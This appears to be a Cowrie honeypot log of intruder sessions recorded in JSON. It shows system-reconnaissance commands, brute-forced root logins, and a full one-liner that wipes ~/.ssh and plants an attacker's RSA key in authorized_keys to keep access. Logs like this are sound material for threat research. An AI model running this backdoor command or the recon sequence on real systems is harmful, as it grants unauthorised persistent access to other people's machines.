{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-09-09T02:26:23.978971Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:23.979947Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:24.442699Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-09-09T02:26:24.443543Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:24.620778Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:24.987279Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-09-09T02:26:24.987938Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:25.165293Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:25.626567Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-09-09T02:26:25.627268Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-09-09T02:26:25.627771Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:25.807373Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:26.244870Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-09-09T02:26:26.245811Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58268,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f33fd07ca15","protocol":"ssh","message":"New connection: 217.72.205.35:58268 (1.2.3.4:22) [session: 6f33fd07ca15]","sensor":"my-vps","timestamp":"2025-09-09T02:26:26.356676Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:26.357778Z","src_ip":"217.72.205.35","session":"6f33fd07ca15"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:26.422562Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:26.786952Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-09-09T02:26:26.787705Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":197,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:26.969605Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:27.433989Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-09-09T02:26:27.434706Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:27.611418Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:28.047269Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-09T02:26:28.048009Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:28.226074Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:28.597225Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-09-09T02:26:28.598031Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:28.774939Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:29.238573Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-09-09T02:26:29.239369Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:29.416322Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:29.782694Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-09T02:26:29.784818Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:29.963052Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:30.426878Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-09-09T02:26:30.427566Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:30.603216Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:31.034321Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-09-09T02:26:31.035001Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:31.210652Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:31.574784Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-09-09T02:26:31.575482Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:31.751329Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.session.closed","duration":"21.8","message":"Connection lost after 21.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:31.752887Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35798,"dst_ip":"1.2.3.4","dst_port":23,"session":"5e9bd3ac018b","protocol":"telnet","message":"New connection: 212.227.235.229:35798 (1.2.3.4:23) [session: 5e9bd3ac018b]","sensor":"my-vps","timestamp":"2025-09-09T02:26:33.747850Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40182,"dst_ip":"1.2.3.4","dst_port":22,"session":"11f7879da8ed","protocol":"ssh","message":"New connection: 212.227.235.229:40182 (1.2.3.4:22) [session: 11f7879da8ed]","sensor":"my-vps","timestamp":"2025-09-09T02:26:39.153101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:26:39.157483Z","src_ip":"212.227.235.229","session":"11f7879da8ed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:26:39.535973Z","src_ip":"212.227.235.229","session":"11f7879da8ed"}
{"eventid":"cowrie.session.connect","src_ip":"85.133.199.248","src_port":48656,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6cb9e946c58","protocol":"ssh","message":"New connection: 85.133.199.248:48656 (1.2.3.4:22) [session: d6cb9e946c58]","sensor":"my-vps","timestamp":"2025-09-09T02:26:39.808980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:26:39.819934Z","src_ip":"85.133.199.248","session":"d6cb9e946c58"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:26:39.905638Z","src_ip":"85.133.199.248","session":"d6cb9e946c58"}
{"eventid":"cowrie.login.success","username":"root","password":"vps12345","message":"login attempt [root/vps12345] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:26:40.312247Z","src_ip":"85.133.199.248","session":"d6cb9e946c58"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:40.570180Z","src_ip":"85.133.199.248","session":"d6cb9e946c58"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:26:40.570910Z","src_ip":"85.133.199.248","session":"d6cb9e946c58"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:26:40.572096Z","src_ip":"85.133.199.248","session":"d6cb9e946c58"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:40.723200Z","src_ip":"85.133.199.248","session":"d6cb9e946c58"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:40.912164Z","src_ip":"85.133.199.248","session":"d6cb9e946c58"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:26:40.912867Z","src_ip":"85.133.199.248","session":"d6cb9e946c58"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:26:41.000853Z","src_ip":"85.133.199.248","session":"d6cb9e946c58"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:41.001697Z","src_ip":"85.133.199.248","session":"d6cb9e946c58"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123456!","message":"login attempt [root/admin123456!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:26:41.068437Z","src_ip":"212.227.235.229","session":"11f7879da8ed"}
{"eventid":"cowrie.session.connect","src_ip":"85.133.199.248","src_port":48668,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ca0af7db721","protocol":"ssh","message":"New connection: 85.133.199.248:48668 (1.2.3.4:22) [session: 0ca0af7db721]","sensor":"my-vps","timestamp":"2025-09-09T02:26:41.091147Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:26:41.093103Z","src_ip":"85.133.199.248","session":"0ca0af7db721"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:26:41.192775Z","src_ip":"85.133.199.248","session":"0ca0af7db721"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:26:41.615478Z","src_ip":"85.133.199.248","session":"0ca0af7db721"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:41.914959Z","src_ip":"212.227.235.229","session":"11f7879da8ed"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:26:41.915630Z","src_ip":"212.227.235.229","session":"11f7879da8ed"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:26:41.916700Z","src_ip":"212.227.235.229","session":"11f7879da8ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:42.307290Z","src_ip":"212.227.235.229","session":"11f7879da8ed"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:42.704508Z","src_ip":"85.133.199.248","session":"0ca0af7db721"}
{"eventid":"cowrie.session.connect","src_ip":"85.133.199.248","src_port":48678,"dst_ip":"1.2.3.4","dst_port":22,"session":"d242c26f97a6","protocol":"ssh","message":"New connection: 85.133.199.248:48678 (1.2.3.4:22) [session: d242c26f97a6]","sensor":"my-vps","timestamp":"2025-09-09T02:26:42.803843Z"}
